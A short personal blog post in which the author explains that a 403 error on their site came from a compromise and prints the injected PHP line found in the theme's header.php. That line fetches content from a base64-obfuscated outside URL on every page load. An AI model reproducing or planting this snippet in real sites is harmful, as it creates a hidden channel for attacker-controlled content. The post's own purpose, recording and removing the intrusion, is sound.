Rogue code and 403 saga

If you have visited my site lately, you would have noticed 403 Forbidden error in the header for the past several days. Well it took meĀ almost two days to figure it out and finally resolve it.

While I’m in the process of moving my hosting away from DreamHost to Azure, it’s that process itself that actually helped me pinpoint the reason behind, stumble upon this article and finally solve it all.

It looks like website was compromised and piece of code was added to theme’s header.php file:

<?php $ch=curl_init();curl_setopt($ch,CURLOPT_URL,base64_decode('aHR0cDovL3FkZ3ZzdC5jb20vbC5waHA='));curl_setopt($ch,CURLOPT_HEADER,0);curl_exec($ch);curl_close($ch);?>

Removing this code completely from theme header.php file solved my problem.

Tags: , , , ,